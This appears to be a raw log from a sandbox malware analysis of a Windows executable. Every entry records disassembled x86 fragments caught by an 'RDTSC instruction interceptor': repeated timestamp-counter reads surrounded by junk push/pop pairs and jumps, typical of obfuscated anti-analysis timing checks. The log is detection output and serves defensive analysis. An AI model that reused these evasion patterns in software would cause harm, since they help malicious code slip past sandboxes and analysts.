Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBCFF second address: ABBD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FAAAC4EBB26h 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAC4EBB33h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBD2F second address: ABBD45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABEDC5 second address: ABEDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB33h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1F16 second address: AC1F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FAAAC4EC6B7h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 jno 00007FAAAC4EC6ACh 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FAAAC4EC6B8h 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1F6F second address: AC1F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1A7D second address: AC1A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AAh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1A8E second address: AC1AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB35h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FAAAC4EBB39h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4FF5 second address: AC4FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4FF9 second address: AC4FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B7A second address: AC4B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B85 second address: AC4B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B8B second address: AC4B91 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD24 second address: ACCD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD2E second address: ACCD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD37 second address: ACCD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75EF3 second address: A75F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F03 second address: A75F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F07 second address: A75F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6ABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F1D second address: A75F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F23 second address: A75F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D1BB4h] 0x0000000f mov ebx, dword ptr [ebp+12479FAEh] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FAAAC4EC6A8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f movzx edx, ax 0x00000032 add eax, ebx 0x00000034 cld 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007FAAAC4EC6B3h 0x0000003c pushad 0x0000003d jc 00007FAAAC4EC6A6h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F79 second address: A75F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACBE9A second address: ACBEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAAAC4EC6A6h 0x0000000a pop edi 0x0000000b je 00007FAAAC4EC6BDh 0x00000011 jmp 00007FAAAC4EC6B1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACBEBE second address: ACBED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FAAAC4EBB2Ch 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACC9F6 second address: ACCA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAAAC4EC6B8h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCA15 second address: ACCA1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACFC32 second address: ACFC4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B4h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD33F1 second address: AD33F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD33F5 second address: AD3404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC5ED second address: ADC5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC5F2 second address: ADC615 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FAAAC4EC6A6h 0x00000009 jmp 00007FAAAC4EC6ABh 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FAAAC4EC6AAh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC615 second address: ADC642 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAAC4EBB3Dh 0x00000008 jmp 00007FAAAC4EBB31h 0x0000000d jnl 00007FAAAC4EBB26h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FAAAC4EBB26h 0x0000001b jc 00007FAAAC4EBB26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADB15B second address: ADB15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADB15F second address: ADB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007FAAAC4EBB26h 0x00000016 pop esi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBCCE second address: ADBCD8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBCD8 second address: ADBCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBFD2 second address: ADBFE1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAAC4EC6A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBFE1 second address: ADBFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAAAC4EBB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC2DA second address: ADC2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF51F second address: ADF523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF84A second address: ADF84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADFB27 second address: ADFB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADFB2C second address: ADFB36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAAC4EC6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE005C second address: AE0060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0060 second address: AE0072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0072 second address: AE0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0078 second address: AE0082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDE00 second address: AEDE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007FAAAC4EBB30h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86C3 second address: AF86C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86C9 second address: AF86CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86CF second address: AF86D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAC4EC6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86D9 second address: AF8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FAAAC4EBB26h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FAAAC4EBB39h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8709 second address: AF870D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF870D second address: AF872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FAAAC4EBB2Eh 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0318E second address: B031CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAAC4EC6A6h 0x00000008 jmp 00007FAAAC4EC6B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jg 00007FAAAC4EC6A6h 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 jo 00007FAAAC4EC6ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAAC4EC6ACh 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B031CC second address: B031FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FAAAC4EBB26h 0x00000011 jmp 00007FAAAC4EBB31h 0x00000016 jmp 00007FAAAC4EBB2Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07BFA second address: B07C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAAAC4EC6B4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C0D second address: B09C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB38h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FAAAC4EBB26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C31 second address: B09C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097CC second address: B097D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097D9 second address: B097DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097DD second address: B097ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAAC4EBB26h 0x00000008 jne 00007FAAAC4EBB26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09948 second address: B09960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17442 second address: B17453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAAC4EBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19284 second address: B192B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B5h 0x00000009 pushad 0x0000000a jmp 00007FAAAC4EC6B0h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B192B4 second address: B192B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22355 second address: B22366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FAAAC4EC6A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22366 second address: B2236C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224CB second address: B224D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224D1 second address: B224E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAAAC4EBB2Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224E9 second address: B224EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224EF second address: B224F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224F6 second address: B224FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22659 second address: B2268B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FAAAC4EBB26h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnl 00007FAAAC4EBB26h 0x00000011 jmp 00007FAAAC4EBB37h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2268B second address: B22695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22695 second address: B226A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jl 00007FAAAC4EBB26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226A9 second address: B226AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226AD second address: B226B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226B3 second address: B226BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226BD second address: B226C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226C3 second address: B226C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2282C second address: B22830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22AEB second address: B22B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 jbe 00007FAAAC4EC6A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22B01 second address: B22B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38651 second address: B38655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38655 second address: B3866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3866F second address: B38679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38679 second address: B3867D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3867D second address: B386A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F43 second address: B35F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F49 second address: B35F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EC6A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FAAAC4EC6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F5C second address: B35F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45B58 second address: B45B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45B60 second address: B45B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45892 second address: B45896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4946C second address: B49484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B614B2 second address: B614B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B614B6 second address: B614C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FAAAC4EBB26h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
